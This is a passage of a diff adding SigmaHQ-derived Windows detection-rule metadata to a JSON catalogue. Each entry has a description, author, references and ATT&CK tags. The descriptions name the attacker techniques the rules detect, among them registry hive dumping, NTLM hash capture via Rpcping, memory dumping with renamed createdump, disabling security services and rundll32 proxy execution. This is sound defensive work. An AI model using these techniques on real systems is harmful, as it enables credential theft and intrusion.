reg.exe utility", + "meta": { + "author": "frack113", + "creation_date": "2021/11/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_reg_bitlocker.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "value": "Suspicious Reg Add BitLocker" + }, + { + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "meta": { + "author": "Florian Roth, John Lambert (idea), elhoim", + "creation_date": "2021/07/14", + "falsepositive": [ + "Unknown", + "Other security solution installers" + ], + "filename": "proc_creation_win_susp_reg_disable_sec_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/1415295021041979392", + "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", + "https://vms.drweb.fr/virus/?i=24144899", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", + "value": "Reg Disable Security Service" + }, + { + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_reg_open_command.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml" + ], + "tags": [ + "attack.credential_access", + 
"attack.t1003" + ] + }, + "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "value": "Suspicious Reg Add Open Command" + }, + { + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_renamed_adfind.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ] + }, + "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "value": "Renamed AdFind Detection" + }, + { + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/20", + "falsepositive": [ + "Command lines that use the same flags" + ], + "filename": "proc_creation_win_susp_renamed_createdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "value": "Renamed CreateDump Process Dump" + }, + { + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/28", + "falsepositive": [ + "Unknown yet" + ], + "filename": "proc_creation_win_susp_renamed_dctask64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" + ] + }, + "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "value": "Renamed ZOHO Dctask64" + }, + { + "description": "Detects suspicious renamed SysInternals DebugView execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_renamed_debugview.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.epicturla.com/blog/sysinturla", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "value": "Renamed SysInternals Debug View" + }, + { + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/22", + "falsepositive": [ + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + ], + "filename": "proc_creation_win_susp_renamed_paexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "value": "Renamed PAExec" + }, + { + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_rpcping.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", + "https://twitter.com/vysecurity/status/974806438316072960", + "https://twitter.com/vysecurity/status/873181705024266241", + 
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", + "value": "Capture Credentials with Rpcping.exe" + }, + { + "description": "Detects suspicious process related to rundll32 based on arguments", + "meta": { + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rundll32_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://twitter.com/Hexacorn/status/885258886428725250", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/nas_bench/status/1433344116071583746", + "https://twitter.com/eral4m/status/1479106975967240209", + "https://twitter.com/eral4m/status/1479080793003671557", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "value": "Suspicious Rundll32 Activity" + }, + { + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" + 
], + "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://github.com/Neo23x0/DLLRunner", + "https://twitter.com/cyb3rops/status/1186631731543236608", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "value": "Suspicious Call by Ordinal" + }, + { + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "value": "Suspicious Rundll32 Invoking Inline VBScript" + }, + { + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "value": "Rundll32 JS RunHTMLApplication Pattern" + }, + { + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/21", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_rundll32_keymgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/NinjaParanoid/status/1516442028963659777", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ] + }, + "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "value": "Suspicious Key Manager Access" + }, + { + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Possible but rare" + ], + "filename": "proc_creation_win_susp_rundll32_no_params.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cobaltstrike.com/help-opsec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", + "value": "Suspicious Rundll32 Without Any CommandLine Params" + }, + { + 
"description": "Detects suspicious process related to rundll32 based on arguments", + "meta": { + "author": "frack113", + "creation_date": "2021/12/04", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rundll32_script_run.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "value": "Suspicious Rundll32 Script in CommandLine" + }, + { + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. 
This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + ], + "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", + "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", + "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", + "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", + "value": "Suspicious Rundll32 Setupapi.dll Activity" + }, + { + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "meta": { + "author": "elhoim, CD_ROM_", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "value": "RunDLL32 Spawning Explorer" + }, + { + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rundll32_sys.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "value": "Suspicious Rundll32 Activity Invoking Sys File" + }, + { + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + ], + "filename": "proc_creation_win_susp_rundll32_user32_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", + "value": "Suspicious Workstation Locking via Rundll32" + }, + { 
+ "description": "This rule detects the execution of Run Once task as configured in the registry", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_runonce_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "value": "Run Once Task Execution as Configured in Registry" + }, + { + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_runscripthelper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "value": "Suspicious Runscripthelper.exe" + }, + { + "description": "Detects suspicious process run from unusual locations", + "meta": { + "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_run_locations.yml", + 
"level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-05-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" + ] + }, + "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "value": "Suspicious Process Start Locations" + }, + { + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rurat_exec_location.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", + "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location" + }, + { + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_change.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + 
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "value": "Suspicious Modification Of Scheduled Tasks" + }, + { + "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_schtasks_delete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "value": "Delete Important Scheduled Task" + }, + { + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_schtasks_delete_all.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": 
"220457c1-1c9f-4c2e-afe6-9598926222c1", + "value": "Delete All Scheduled Tasks" + }, + { + "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_disable.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "value": "Disable Important Scheduled Task" + }, + { + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/21", + "falsepositive": [ + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + ], + "filename": "proc_creation_win_susp_schtasks_env_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", + "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "81325ce1-be01-4250-944f-b4789644556f", + "value": "Suspicious Schtasks From Env Var Folder" + }, + { + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_folder_combos.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "value": "Schtasks From Suspicious Folders" + }, + { + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Software installers that run from temporary folders and also install scheduled tasks" + ], + "filename": "proc_creation_win_susp_schtasks_parent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "9494479d-d994-40bf-a8b1-eea890237021", + "value": "Suspicious Add Scheduled Task Parent" + }, + { + "description": "Detects suspicious scheduled 
task creations with commands that are uncommon", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Software installers that run from temporary folders and also install scheduled tasks" + ], + "filename": "proc_creation_win_susp_schtasks_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "value": "Suspicious Add Scheduled Command Pattern" + }, + { + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate processes that run at logon. 
Filter according to your environment" + ], + "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "value": "Suspicious Schtasks Schedule Types" + }, + { + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "Some installers were seen using this method of creation unfortunately. 
Filter them in your environment" + ], + "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "value": "Suspicious Schtasks Schedule Type With High Privileges" + }, + { + "description": "schtasks.exe create task from user AppData\\Local\\Temp", + "meta": { + "author": "frack113", + "creation_date": "2021/11/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_user_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", + "value": "Suspicious Add Scheduled Task From User AppData Temp" + }, + { + "description": "Detects the creation of scheduled tasks in user session", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "filename": "proc_creation_win_susp_schtask_creation.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
